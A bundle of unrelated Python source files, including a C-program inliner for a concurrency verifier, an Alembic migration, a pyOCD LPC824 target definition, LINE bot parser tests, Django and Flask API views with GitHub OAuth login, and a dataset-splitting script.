return 'goto __exit_%s; ' % (self.currentFunction[-1])
#return 'goto _RETURN_exit_%s_%s;' % (self.currentFunction, self.funcInlinedCount[self.currentFunction])
elif self.currentFunction[-1] == 'main':
#~return 'goto __exit_main; /* return stmt in main() */'
self.__exit_args[self.currentFunction[-1]] = '0'
return 'goto __exit_main; '
s = 'return'
if n.expr: s += ' ' + self.visit(n.expr)
return s + ';'
''' TODO: labels inside inlined functions must be indexed using indexStack
'''
'''
def visit_Label(self, n):
if self.currentFunction in self.__functionsToBeInlined:
return n.name + self.indexStack[-1] + ':\n' + self._generate_stmt(n.stmt)
else:
return n.name + ':\n' + self._generate_stmt(n.stmt)
'''
''' TODO gotos-to-labels inside inlined functions must be indexed using indexStack
'''
'''
def visit_Goto(self, n):
if self.currentFunction in self.__functionsToBeInlined:
return 'goto ' + n.name + self.indexStack[-1] + '; /* updated label index from previous goto stmt */'
else:
return 'goto ' + n.name + ';'
'''
def visit_Struct(self, n):
#
oldParsingStruct = self.__parsingStruct
self.__parsingStruct = True
s = self._generate_struct_union(n, 'struct')
self.__parsingStruct = oldParsingStruct
return s
@staticmethod
def _initVar(varType, varName, varTypeUnExpanded):
s = ''
if varType == 'int':
s = '%s = __CSEQ_nondet_int()' % varName
elif varType == 'unsigned int':
s = '%s = __CSEQ_nondet_uint()' % varName
elif varType == '_Bool' or varType == 'bool':
s = '%s = __CSEQ_nondet_bool()' % varName
elif varType == 'char':
s = '%s = __CSEQ_nondet_char()' % varName
elif varType == 'unsigned char':
s = '%s = __CSEQ_nondet_uchar()' % varName
elif varType == 'unsigned long':
s = '%s = __CSEQ_nondet_uint()' % varName
elif varType == '__cs_t':
s = ''
elif varType == '__cs_mutex_t':
s = ''
elif varType == '__cs_cond_t':
s = ''
elif varType == '__cs_barrier_t':
s = ''
elif varType == '__cs_attr_t':
s = ''
else:
s = '__cs_init_scalar(&%s, sizeof(%s))' % (varName, varType)
return s
def _hasBeenAssignedLater(self, varname):
# There is case where a variable does not need an nondet assignment
# 1. There is an immediate assign statement after the declaration of variable
# 2. This variable is created in the sack of for loop
# --> the two cases above can be compacted into one case: there is an assignment to variable after this
if (len(self.currentFunction) > 0 and
self.currentFunction[-1] != '' and
self.currentFunction[-1] in self.Parser.varNoNeedInit and
varname in self.Parser.varNoNeedInit[self.currentFunction[-1]]):
return True
return False
def _needInit(self, varname):
if ('__cs_switch_cond' in varname or # from switchtransformer.py
'__cs_tmp_if_cond_' in varname or # from extractor.py
'__cs_tmp_while_cond_' in varname or # from extractor.py
'__cs_tmp_for_cond_' in varname or # from extractor.py
'__cs_dowhile_onetime_' in varname or # from remover.py
self._hasBeenAssignedLater(varname)):
return False
return True
def visit_Decl(self, n, no_type=False):
# no_type is used when a Decl is part of a DeclList, where the type is
# explicitly only for the first delaration in a list.
#
s = n.name if no_type else self._generate_decl(n)
if n.bitsize:
s += ' : ' + self.visit(n.bitsize)
#S: added to handle declaration of constant variables, no transformation is required.
if "const" in s.split():
if n.init:
s += '=' + self.visit(n.init)
return s
# Change local variables to be static vars,
# needed for this particular encoding to remember the old values of local variables
# between simulated context switches.
#
# If the variable is scalar or it is an array of fixed size, then just add static to its declaration.
# If the variable is an array of non fixed size, then change it to a static pointer and adds a call to malloc() to complete the initialization,
# (e.g. int x[size]; --> static int * x; x = (int *)malloc(sizeof(int)*size); )
#
# TODO: init_scalar()/malloc() should not be called when variables have init expressions!
#
processInit = False # Has processed the init expression
if (isinstance(n, c_ast.Decl) and # it is a declaration
self.currentFunction[-1] != '' and # Not a global declaration
self.indent_level > 0 and # This is kind of useless
not s.startswith('static ') and # This may not usefull
not self.__parsingStruct): # and not part of a struct
if ((self.__isScalar(self.currentFunction[-1], n.name) or
self.__isStruct(self.currentFunction[-1], n.name)) and
# Do not believe this check of having init expression??
not self.Parser.varInitExpr[self.currentFunction[-1], n.name]):
s = 'static ' + s # declaration
if n.init: # This variables has Init expression
processInit = True
if isinstance(n.init, c_ast.InitList):
s += ' = {' + self.visit(n.init) + '}'
elif isinstance(n.init, c_ast.ExprList):
s += '; %s = (' % n.name + self.visit(n.init) + ')'
else:
s += '; %s = ' % n.name + self.visit(n.init)
else: # no init
if self.__isScalar(self.currentFunction[-1], n.name):
varType = self.Parser.varType[self.currentFunction[-1], n.name]
varTypeUnExpanded = self.Parser.varTypeUnExpanded[self.currentFunction[-1], n.name]
initialStmt = '; ' + self._initVar(varType, n.name, varTypeUnExpanded) if self._needInit(n.name) else ''
s += initialStmt
elif self.__isStruct(self.currentFunction[-1], n.name):
s += ''
else: ## what can it be?
s += '; __cs_init_scalar(&%s, sizeof(%s))' % (
n.name, self.Parser.varType[self.currentFunction[-1], n.name])
elif (self.__isScalar(self.currentFunction[-1], n.name) and
# Do not believe this check, it is not always true???
self.Parser.varInitExpr[self.currentFunction[-1], n.name]):
s = 'static ' + s
if n.init:
processInit = True
if isinstance(n.init, c_ast.InitList):
s += ' = {' + self.visit(n.init) + '}'
elif isinstance(n.init, c_ast.ExprList):
s += '; %s = (' % n.name + self.visit(n.init) + ')'
else:
s += '; %s = ' % n.name + self.visit(n.init)
else:
varType = self.Parser.varType[self.currentFunction[-1], n.name]
varTypeUnExpanded = self.Parser.varTypeUnExpanded[self.currentFunction[-1], n.name]
initialStmt = '; ' + self._initVar(varType, n.name, varTypeUnExpanded) if self._needInit(n.name) else ''
s += initialStmt
elif self.__isArray(self.currentFunction[-1], n.name):
# There are two cases:
# 1. this array has a constant expression of compound literal
# 2. anything else
init = ''
initType = 0
if n.init:
processInit = True
if isinstance(n.init, c_ast.InitList):
init = ' = {' + self.visit(n.init) + '}'
initType = 1
elif isinstance(n.init, c_ast.ExprList):
init = ' = (' + self.visit(n.init) + ')'
initType = 0
else:
init = ' = ' + self.visit(n.init)
initType = 0
if initType == 1:
# Case 1
s = 'static ' + s + init
else:
# Anything else
if processInit:
if self._is_dynamic_size_array(self.currentFunction[-1], n.name):
s = 'static ' + s + init
else:
s = 'static ' + s + '; %s' % n.name + init
else:
if self.keepstaticarray:
s = 'static ' + s
else:
stars = '*' * self.Parser.varArity[self.currentFunction[-1], n.name]
vartype = self.Parser.varType[self.currentFunction[-1], n.name]
s = 'static %s %s %s; ' % (vartype, stars, n.name)
s += n.name + ' = (%s %s) %s(sizeof(%s)*%s)' % (vartype, stars, core.common.changeID['malloc'], vartype, self._totalSize(self.currentFunction[-1], n.name))
else: # Anything else, Truc's modification
init = ''
initType = 0
if n.init:
processInit = True
if isinstance(n.init, c_ast.InitList):
init = ' = {' + self.visit(n.init) + '}'
initType = 1
elif isinstance(n.init, c_ast.ExprList):
init = ' = (' + self.visit(n.init) + ')'
initType = 0
else:
init = ' = ' + self.visit(n.init)
initType = 0
if initType == 1:
s = 'static ' + s + init
else:
if processInit:
if self._is_dynamic_size_array(self.currentFunction[-1], n.name):
s = 'static ' + s + init
else:
s = 'static ' + s + '; %s' % n.name + init
else:
s = 'static ' + s + '; __cs_init_scalar(&%s, sizeof(%s))' % (
n.name, self.Parser.varType[self.currentFunction[-1], n.name])
# Global variables and already static variables
if n.init and not processInit:
if isinstance(n.init, c_ast.InitList):
s += ' = {' + self.visit(n.init) + '}'
elif isinstance(n.init, c_ast.ExprList):
s += ' = (' + self.visit(n.init) + ')'
else:
s += ' = ' + self.visit(n.init)
return s
''' OMAR CODE
def visit_Decl(self, n, no_type=False):
# no_type is used when a Decl is part of a DeclList, where the type is
# explicitly only for the first delaration in a list.
#
s = n.name if no_type else self._generate_decl(n)
if n.bitsize: s += ' : ' + self.visit(n.bitsize)
# Change local variables to be static vars,
# needed for this particular encoding to remember the old values of local variables
# between simulated context switches.
#
# If the variable is scalar or it is an array of fixed size, then just add static to its declaration.
# If the variable is an array of non fixed size, then change it to a static pointer and adds a call to malloc() to complete the initialization,
# (e.g. int x[size]; --> static int * x; x = (int *)malloc(sizeof(int)*size); )
#
# TODO: init_scalar()/malloc() should not be called when variables have init expressions!
#
nondet_function = {}
nondet_function['int'] = "__CSEQ_nondet_int()"
nondet_function['unsigned int'] = "__CSEQ_nondet_uint()"
nondet_function['_Bool'] = "__CSEQ_nondet_bool()"
nondet_function['char'] = "__CSEQ_nondet_char()"
nondet_function['unsigned char'] = "__CSEQ_nondet_uchar()"
if (isinstance(n, c_ast.Decl) and
self.currentFunction[-1] != '' and
self.indent_level > 0 and
not s.startswith('static ') and
not self.__parsingStruct):
if (self.__isScalar(self.currentFunction[-1], n.name) or self.__isStruct(self.currentFunction[-1], n.name)) and not self.Parser.varInitExpr[self.currentFunction[-1], n.name]:
#if self.__isScalar(self.currentFunction[-1], n.name) and not self.Parser.varInitExpr[self.currentFunction[-1], n.name]:
vartype = self.Parser.varType[self.currentFunction[-1], n.name]
# if vartype not in ("int", "unsigned int", "_Bool", "char", "unsigned char", ):
s = 'static ' + s + '; __cs_init_scalar(&%s, sizeof(%s))' % (n.name, vartype)
# else:
# s = 'static ' + s + '; %s = %s' % (n.name, nondet_function[vartype])
#s = 'static ' + s + '; malloc(&%s, sizeof(%s))' % (n.name, self.Parser.varType[self.currentFunction[-1], n.name])
elif self.__isScalar(self.currentFunction[-1], n.name) and self.Parser.varInitExpr[self.currentFunction[-1], n.name]:
s = 'static ' + s
elif self.__isArray(self.currentFunction[-1], n.name):
stars = '*' * self.Parser.varArity[self.currentFunction[-1], n.name]
vartype = self.Parser.varType[self.currentFunction[-1],n.name]
s = 'static %s %s %s; ' % (self.Parser.varType[self.currentFunction[-1], n.name], stars, n.name)
s += n.name + ' = (%s %s)malloc(sizeof(%s)*%s); __CSEQ_assume(%s)' % (vartype, stars, vartype, self._totalSize(self.currentFunction[-1], n.name), n.name)
if n.init:
if isinstance(n.init, c_ast.InitList):
s += ' = {' + self.visit(n.init) + '}'
elif isinstance(n.init, c_ast.ExprList):
s += ' = (' + self.visit(n.init) + ')'
else:
s += ' = ' + self.visit(n.init)
return s
'''
# def visit_Label(self, n):
# # Truc (method 1: simply add an empty statement)
# return n.name + ':;\n' + self._generate_stmt(n.stmt)
########################################################################################
def _inlineIfNeeded(self, stmt):
# Truc comment this for method 2
# self.inlinedStack.append('')
# original = self._generate_stmt(stmt)
# original = original.replace('DELETETHIS;\n', '')
# original = self.inlinedStack[-1] + original
# self.inlinedStack.pop()
# Truc (method 2: Identify inlined function call by inlinedStacked
# and change things according to type of statements)
self.inlinedStack.append('')
original = ''
if isinstance(stmt, pycparser.c_ast.Label):
label = stmt.name
# TRUC, todo 3
if len(self.currentFunction) > 0 and self.____needsInlining(self.currentFunction[-1]):
count = 0 if self.currentFunction[-1] not in self.funcInlinedCount else self.funcInlinedCount[self.currentFunction[-1]] - 1
label = label + '_' + self.currentFunction[-1] + '_' + str(count)
original = self._generate_stmt(stmt.stmt)
if self.inlinedStack[-1] == '': # If this statement doesn't contain inlined function
original = label + ':\n' + original
else:
original = original.replace('DELETETHIS;\n', '')
original = label + ':;\n' + self.inlinedStack[-1] + original
else:
original = self._generate_stmt(stmt)
original = original.replace('DELETETHIS;\n', '')
original = self.inlinedStack[-1] + original
self.inlinedStack.pop()
return original
''' Generate the function body,
for either including it in a function definition, or
for inserting it into a statement
'''
def _inlineFunction(self, n, fcall_ast_node, simple):
fInput = fOutput = ''
fref = n.decl.name
#print "inlining function:%s %s" % (fref, str(self.currentFunctionParams))
# Simulate input parameter passing.
#
# Build argument initialization statement(s) if needed, to simulate parameter passing
# (see transformation details below)
#
# args = self.visit(fcall_ast_node.args) # ?????
# Analysis of function-call parameters
#
self.parametersToRemoveStack.append([])
self.switchTo.append({})
if fcall_ast_node.args is not None:
paramNo = -1
#
#
for expr in fcall_ast_node.args.exprs: # for each parameter in the function call
paramNo += 1
if (isinstance(expr, pycparser.c_ast.UnaryOp) and
expr.op == '&' and
expr.expr.name not in self.Parser.varNames[self.currentFunction[-1]] and
expr.expr.name in self.Parser.varNames[''] and
len(self.Parser.varOccurrence[fref, self.Parser.funcParams[fref][paramNo]]) - len(self.Parser.varDeReferenced[fref,self.Parser.funcParams[fref][paramNo]]) == 0):
#print "varname: %s currentscope:%s currentfinlined:%s parameterno:%s" % (expr.expr.name, self.currentFunction[-1], fref, paramNo)
#print "variable %s is global and referenced!!" % expr.expr.name
#print "the corrseponding function parameter is %s" % (self.Parser.funcParams[fref][paramNo])
#print "is it always dereferenced? %s %s" % (len(self.Parser.varOccurrence[fref, self.Parser.funcParams[fref][paramNo]]), len(self.Parser.varDeReferenced[fref,self.Parser.funcParams[fref][paramNo]]) )
#print "\n"
#exit(12345)
##print "REMOVE reference to global variable '&%s' from the fuction call!!!!" % expr.expr.name
self.parametersToRemoveStack[-1].append('&'+expr.expr.name) # parameter expr.expr.name in the call to fref() can to be removed
##print "IN THE FUNCTION BODY CHANGE (*%s) -> %s" % (self.Parser.funcParams[fref][paramNo], expr.expr.name)
self.switchTo[-1][self.Parser.funcParams[fref][paramNo]] = expr.expr.name
if fcall_ast_node.args is not None:
i = 0
for p in self.Parser.varNames[fref]:
if self.Parser.varKind[fref,p] == 'p':
#print "parameters to remove %s" % str(self.parametersToRemoveStack[-1])
#print "p = %s" % p
#print "\n\n"
if self.currentFunctionParams[-1][i] in self.parametersToRemoveStack[-1]:
i += 1
continue # this parameter is not needed
if not self.__isPointerToFunction(fref,p) and not self.__isArray(fref,p):
##print " p %s " % p
##print " fref %s" % fref
##print " type %s" % self.Parser.varTypeUnExpanded[fref,p]
##print " param %s\n" % self.currentFunctionParams[-1][i]
fInput += 'static %s %s; %s = %s; ' % (self.Parser.varTypeUnExpanded[fref,p], p, p, self.currentFunctionParams[-1][i])
i += 1
elif not self.__isPointerToFunction(fref,p) and self.__isArray(fref,p):
varSize = ''
stars = ''
'''
for s in self.Parser.varSize[fref,p]:
if s != -1: varSize += '[%s]' % s
else: varSize += '[]'
'''
for s in self.Parser.varSize[fref,p]:
#varSize += '[%s]' % (s if s != -1 else '')
#####varSize += '[]' # ignore the size for array passed as function parameters
stars += '*'
#####fInput += 'static %s %s%s; %s = %s; ' % (self.Parser.varTypeUnExpanded[fref,p], p, varSize, p, self.currentFunctionParams[-1][i])
fInput += 'static %s %s%s; %s = %s; ' % (self.Parser.varTypeUnExpanded[fref,p], stars, p, p, self.currentFunctionParams[-1][i])
else:
x = self.Parser.varTypeUnExpanded[fref,p].replace('(*)', '(*%s)' % p)
fInput += 'static %s; %s = %s; ' % (x, p, self.currentFunctionParams[-1][i])
i += 1
# Simulate output parameter returning.
#
if not self.Parser.funcIsVoid[fref]:
fOutput = 'static %s __cs_retval_%s;\n' % (self.Parser.funcBlockOut[fref], self.indexStack[-1])
else: # simple function call without assignment (e.g. f(x);)
fOutput = ''
# Truc - dirty fix, just inlude the line map of that function call
fOutput = self._getCurrentCoords(fcall_ast_node) + '\n' + fOutput
# Transform the function body by:
#
# 1. adding the initialization statement(s) (if any) at the top
# 2. adding one exit label at the bottom where to jump to in order to simulate return statements
# 3. change return statements to goto statements pointing to the exit label added in previous step
# 4. all the rest is unchanged
#
# body (adds one indent each line)
self.currentFunction.append(fref)
#inlined = self._shiftIndent(self.visit(self.Parser.funcASTNode[fref].body))
# save the old length so after the inlining self.lines can be trimmed back to its contents before the inlining,
# this removes the elements added while inlining,
# otherwise when inlining the same function more than once,
# the linemapping is only generated on the first inlined function call.
oldlineslen = len(self.lines)
inlined = self.visit(self.Parser.funcASTNode[fref].body)
self.functionlines[fref] = self.lines[oldlineslen:]
self.lines = self.lines[:oldlineslen]
# top
#~inlined = inlined.replace(self.INDENT_SPACING+'{', '/*** INLINING START %s ***********************************/\n' % fref + self.INDENT_SPACING + fOutput + self._make_indent() +'{\n' + self._make_indent() + fInput, 1)
inlined = inlined[inlined.find('{')+1:]
if self.atomicparameter:
fInput = '__CSEQ_atomic_begin();' + fInput
if fref in self.__canbemerged and self.__canbemerged[fref]:
inlined = inlined.replace('__CSEQ_atomic_begin()', '', 1)
else:
fInput += '__CSEQ_atomic_end();'
addedheader = self.INDENT_SPACING + fOutput + self._make_indent() + '{\n' + self._make_indent(1) + fInput
inlined = addedheader + inlined
# bottom
inlined = inlined[:inlined.rfind('}')] + '%s __exit_%s: ; \n' % (self._make_indent(1), self.indexStack[-1]) + self._make_indent() +'}\n'
#~inlined += '\n' + self._make_indent() + '/*** INLINING END %s **************************************/' % fref
self.parametersToRemoveStack.pop()
self.switchTo.pop()
self.currentFunction.pop()
return inlined
# Shift one indent each line.
#
def _shiftIndent(self, s):
new = ''
for line in s.splitlines():
new += self.INDENT_SPACING+ line + '\n'
return new
''' Check whether variable v from function f has a fixed size,
or not (e.g. int x[expr] with expr not constant.
'''
def _hasFixedSize(self, f, v):
if self.Parser.varArity[f,v] > 0:
for i in range(0, self.Parser.varArity[f,v]):
if not self.Parser.varSize[f,v][i].isdigit():
return False
return True
''' Return the total size of a given array in a string,
as the expression of the product of all sizes.
For example:
int x[10][expr][3];
returns:
size = 10*(expr)*30;
'''
def _totalSize(self, f, v):
sizeExpression = ''
for i in range(0, self.Parser.varArity[f,v]):
#if self.Parser.varSize[f,v][i].isdigit(): # simple digit
sizeExpression += str(self.Parser.varSize[f,v][i]) + '*'
sizeExpression = sizeExpression[:-1]
return sizeExpression
# Checks whether variable v from function f is an array.
#
def __isArray(self, f, v):
if self.Parser.varArity[f,v] > 0:
return 1
else:
return 0
# Checks whether variable v from function f is scalar.
# TODO redo properly at parser-level
#
def __isScalar(self, f, v):
if self.Parser.varArity[f, v] == 0 and not self.Parser.varType[f,v].startswith('struct ') and not self.Parser.varType[f,v].startswith('union '):
return 1
else:
return 0
# Checks whether variable v from function f is a struct.
# TODO redo properly at parser-level
#
def __isStruct(self, f, v):
result = 0
if self.Parser.varType[f, v].startswith('struct '):
result = 1
return result
def __isPointerToFunction(self, f, v):
if (f,v) in self.Parser.varPtrToFunct: return True
else: return False
#if '(*)' in self.Parser.varType[f,v]: return True
#else: return False
''' Check whether function f needs to be inlined.
'''
def ____needsInlining(self, f):
return (f in self.Parser.funcBlock and # defined functions need to be inlined when called (if at all)
not f.startswith('__CSEQ_atomic') and
#not f.startswith(core.common.funcPrefixChange['__VERIFIER_atomic']) and
not f == '__CSEQ_assert' and
##f not in self.Parser.threadName and
f != '' and
f != 'main')
def _is_dynamic_size_array(self, f, v):
if (f, v) not in self.Parser.varID:
return False
if self.Parser.varArity[f, v] == 1 and self.Parser.varSize[f, v][0] == -1:
return True
return False
def _is_recursive(self, fname):
if fname not in self.Parser.callReferences: # This will never happen
return False
if fname in self.Parser.callReferences[fname]: # This function calls itself
return True
# Final check
calleeF = self.Parser.callReferences[fname] # Function that calls f
callerF = {} # Function that is called from f
for f in self.Parser.callReferences:
if f != fname and fname in self.Parser.callReferences[f]:
callerF[f] = 1
intersect = [k for k in calleeF if k in callerF]
if len(intersect) > 0:
return True
else:
return False
return False
|
"""Add admin to User, name to RepoGroup
Revision ID: a051167419fa
Revises: 2eaa930b1f5a
Create Date: 2019-02-17 13:09:42.138936
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'a051167419fa'
down_revision = '2eaa930b1f5a'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('repo_group', sa.Column('name', sa.String(length=128), nullable=True))
op.add_column('user', sa.Column('administrator', sa.Boolean(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('user', 'administrator')
op.drop_column('repo_group', 'name')
# ### end Alembic commands ###
|
# pyOCD debugger
# Copyright (c) 2006-2013 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ...flash.flash import Flash
from ...coresight.coresight_target import CoreSightTarget
from ...core.memory_map import (FlashRegion, RamRegion, MemoryMap)
from ...debug.svd.loader import SVDFile
FLASH_ALGO = {
'load_address' : 0x10000000,
'instructions' : [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x47700a80, 0x21004842, 0x22016301, 0x63416342, 0x6b416342, 0xd0fc07c9, 0x493e6382, 0x70082002,
0x47702000, 0x47702000, 0x4c3bb5f8, 0x25002032, 0x261f444c, 0x493960a6, 0x60206065, 0x4f384449,
0x91004620, 0x696047b8, 0xd10b2800, 0x203460a6, 0x60206065, 0x60e04833, 0x99004620, 0x696047b8,
0xd0002800, 0xbdf82001, 0x4d2bb5f8, 0x444d0a84, 0x492a606c, 0x60ac2032, 0x60284449, 0x460f4e28,
0x47b04628, 0x28006968, 0x606cd10b, 0x60ac2034, 0x48246028, 0x463960e8, 0x47b04628, 0x28006968,
0x2001d000, 0xb5f8bdf8, 0x00054614, 0x6861d10e, 0x68e26820, 0x68a11840, 0x18401889, 0x18406921,
0x18406961, 0x184069a1, 0x61e04240, 0x0aa84e12, 0x2132444e, 0x60316070, 0x60b04910, 0x4f104449,
0x91004630, 0x697047b8, 0xd10e2800, 0x20336075, 0x603060b4, 0x02402001, 0x480a60f0, 0x46306130,
0x47b89900, 0x28006970, 0x2001d000, 0x0000bdf8, 0x40048040, 0x40048000, 0x00000004, 0x00000018,
0x1fff1ff1, 0x00002ee0, 0x00000000,
],
'pc_init' : 0x10000025,
'pc_erase_sector' : 0x10000089,
'pc_program_page' : 0x100000C7,
'pc_eraseAll' : 0x10000049,
# Double buffering is not supported since sector size differs from page size
'static_base' : 0x10000000 + 0x00000020 + 0x00000128,
'begin_data' : 0x10000000 + 0x00000800, # Analyzer uses a max of 128 B data (32 pages * 4 bytes / page)
'begin_stack' : 0x10000800,
'min_program_length' : 1024,
'analyzer_supported' : True,
'analyzer_address' : 0x10001000 # Analyzer 0x10001000..0x10000600
}
class LPC824(CoreSightTarget):
VENDOR = "NXP"
MEMORY_MAP = MemoryMap(
FlashRegion( start=0, length=0x8000, is_boot_memory=True,
blocksize=1024,
page_size=512,
algo=FLASH_ALGO),
RamRegion( start=0x10000000, length=0x2000)
)
def __init__(self, session):
super(LPC824, self).__init__(session, self.MEMORY_MAP)
self._svd_location = SVDFile.from_builtin("LPC824.xml")
def reset_and_halt(self, reset_type=None, map_to_user=True):
super(LPC824, self).reset_and_halt(reset_type)
# Remap to use flash and set SP and SP accordingly
if map_to_user:
self.write_memory(0x40048000, 0x2, 32)
sp = self.read_memory(0x0)
pc = self.read_memory(0x4)
self.write_core_register('sp', sp)
self.write_core_register('pc', pc)
|
def clear_app_settings_cache():
# Clean up. Django Pods caches settings once loaded. Remove cached settings
from silhouette.apps import Silhouette
if hasattr(Silhouette.settings, 'PATH'):
del Silhouette.settings.PATH
if hasattr(Silhouette.settings, 'THEME'):
del Silhouette.settings.THEME
if hasattr(Silhouette.settings, 'PATTERNS'):
del Silhouette.settings.PATTERNS
|
from datetime import datetime
import linebot.models as models
from teitoku.parser.line_parser import LineParser
from teitoku.message.text_message import TextMessage
from teitoku.source import SourceUser, SourceGroup, SourceRoom
def test_parse_text_message_source_user():
timestamp = datetime.utcnow()
text_message = models.TextMessage("123", "test")
source = models.SourceUser("user1")
message_event = models.MessageEvent(
timestamp.timestamp() * 1000, source, "reply_token", text_message)
parsed_request = LineParser.parse(message_event)
parsed_message = parsed_request.message
assert parsed_request.timestamp == timestamp
assert parsed_message.content == "test"
assert parsed_message.content_type == "text"
assert parsed_message.gateway == "line"
assert isinstance(parsed_message.source, SourceUser)
assert parsed_message.source.user_id == 'user1'
def test_parse_text_message_source_group():
timestamp = datetime.utcnow()
text_message = models.TextMessage("123", "test")
source = models.SourceGroup("group1", "user1")
message_event = models.MessageEvent(
timestamp.timestamp() * 1000, source, "reply_token", text_message)
parsed_request = LineParser.parse(message_event)
parsed_message = parsed_request.message
assert parsed_request.timestamp == timestamp
assert parsed_message.content == "test"
assert parsed_message.content == "test"
assert parsed_message.content_type == "text"
assert parsed_message.gateway == "line"
assert isinstance(parsed_message.source, SourceGroup)
assert parsed_message.source.user_id == 'user1'
assert parsed_message.source.group_id == 'group1'
def test_parse_text_message_source_room():
timestamp = datetime.utcnow()
text_message = models.TextMessage("123", "test")
source = models.SourceRoom("room1", "user1")
message_event = models.MessageEvent(
timestamp.timestamp() * 1000, source, "reply_token", text_message)
parsed_request = LineParser.parse(message_event)
parsed_message = parsed_request.message
assert parsed_request.timestamp == timestamp
assert parsed_message.content == "test"
assert parsed_message.content == "test"
assert parsed_message.content_type == "text"
assert parsed_message.gateway == "line"
assert isinstance(parsed_message.source, SourceRoom)
assert parsed_message.source.user_id == 'user1'
assert parsed_message.source.room_id == 'room1'
|
from rest_framework import mixins
from rest_framework import filters
from rest_framework import status
from rest_framework import viewsets
from rest_framework.decorators import detail_route, list_route
from rest_framework.response import Response
from members.models import Member, ComiteMembership, AcademicYear
from members.serializers import MemberSerializer, MemberCardSerializer, MemberMembershipQuerySerializer
class MemberViewSet(mixins.RetrieveModelMixin,
mixins.ListModelMixin,
viewsets.GenericViewSet):
"""
@desc: API to visualize cerkinfo's members.
"""
queryset = Member.objects.all()
serializer_class = MemberSerializer
filter_backends = (
filters.SearchFilter,
filters.OrderingFilter
)
search_fields = ('user__username', 'user__first_name', 'user__last_name')
@list_route(methods=['get', 'post'])
def self(self, request, pk=None, **kwargs):
current = Member.objects.get(user=request.user)
serializer = MemberSerializer(current)
return Response(serializer.data)
@detail_route(methods=['post'])
def register_member_card(self, request, pk=None):
serializer = MemberCardSerializer(data=request.data)
if serializer.is_valid():
ms = ComiteMembership.objects.get_or_create(
member_id=serializer.data['member'],
year__slug=serializer.data['year']
)[0]
ms.card_id = serializer.data['id']
ms.paid = serializer.data['paid']
ms.save()
return Response({'status': 'card id registered'})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
class MemberMembershipQuery(mixins.RetrieveModelMixin,
mixins.ListModelMixin,
viewsets.GenericViewSet):
"""
@desc: API endpoint to verify if a card_id is one of a member.
@args{card_id}: A {card_id} argument is passed in the url to verify if the
{card_id} is one of a member.
"""
queryset = Member.objects.all()
serializer_class = MemberSerializer
def get_queryset(self):
cid = self.kwargs.get('card_id', None)
return Member.objects.filter(card_id=cid)
|
from flask import request, g, url_for
from flask_restful import Resource
from flask_jwt_extended import create_access_token, create_refresh_token
from oauth import github
from models.user import UserModel
class GithubLogin(Resource):
@classmethod
def get(cls):
return github.authorize(url_for('github.authorized', _external=True)) # _external=True means we want to build the whole address for external purposes
class GithubAuthorize(Resource):
@classmethod
def get(cls):
resp = github.authorized_response()
if resp is None or resp.get('access_token') is None:
error_response = {
'error': request.args['error'],
'error_description': request.args['error_description']
}
return error_response
g.access_token = resp['access_token']
github_user = github.get('user')
github_username = github_user.data['login']
user = UserModel.find_by_username(github_username)
if not user:
user = UserModel(username=github_username, password=None)
user.save_to_db()
access_token = create_access_token(identity=user.id, fresh=True)
refresh_token = create_refresh_token(user.id)
return {'access_token': access_token, 'refresh_token': refresh_token}, 200 |
"""reviews models."""
# Django
from django.db import models
# Models
from apps.users.models import User
class Review(models.Model):
"""Review base model. all reviews extends from this model
to be more scalable if more products than camera or lens are
reviewed"""
title = models.CharField(max_length=30)
content = models.TextField(max_length=800)
author = models.ForeignKey(User, on_delete=models.CASCADE)
class Meta:
"""Meta option."""
abstract = True |
'''
Randomly assign images in a folder to a training, validation, and test set.
~ Christopher Pramerdorfer
'''
import os
import sys
import pickle
import random
import json
rng = 1337 # rng seed
frac_test = 0.1535 # test fraction
frac_val = 0.0905 # val fraction of training set (after removing test samples)
source = '/mnt/storage/datasets/image-manipulation/RAISE/RAISE20-1300-1337/images' # directory to read from
dest = '/mnt/storage/datasets/image-manipulation/RAISE/RAISE20-1300-1337/tvt-{}-{}-{}.json'.format(rng, frac_test, frac_val) # file to save to
imext = '.png' # file ending of images
# -------
if not os.path.isdir(source):
sys.exit('"{}" is no directory'.format(source))
if os.path.exists(dest):
sys.exit('"{}" already exists'.format(dest))
# -------
ims = sorted([f for f in os.listdir(source) if f.endswith(imext)])
print('{} images found'.format(len(ims)))
random.seed(rng)
random.shuffle(ims)
idx = int(len(ims)*(1.0-frac_test))
itest = ims[idx:]
ims = ims[:idx]
idx = int(len(ims)*(1.0-frac_val))
ival = ims[idx:]
itrain = ims[:idx]
print(' {} training images'.format(len(itrain)))
for im in itrain:
print(' {}'.format(im))
print(' {} validation images'.format(len(ival)))
for im in ival:
print(' {}'.format(im))
print(' {} test images'.format(len(itest)))
for im in itest:
print(' {}'.format(im))
with open(dest, 'w') as f:
json.dump({'train': itrain, 'val': ival, 'test': itest}, f, indent=2, separators=(',', ': '))
print('Split information saved to "{}"'.format(dest))
|
# Copyright 2016 James Hensman, alexggmatthews, PabloLeon, Valentine Svensson
# Copyright 2018 KAIST under XAI Project supported by Ministry of Science and ICT, Korea
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
import numpy as np
from .param import Param, ParamList, Parameterized
from ._settings import settings
from layers import affine_relu_forward, affine_forward
float_type = settings.dtypes.float_type
np_float_type = np.float32 if float_type is tf.float32 else np.float64
class MeanFunction(Parameterized):
"""
The base mean function class.
To implement a mean function, write the __call__ method. This takes a
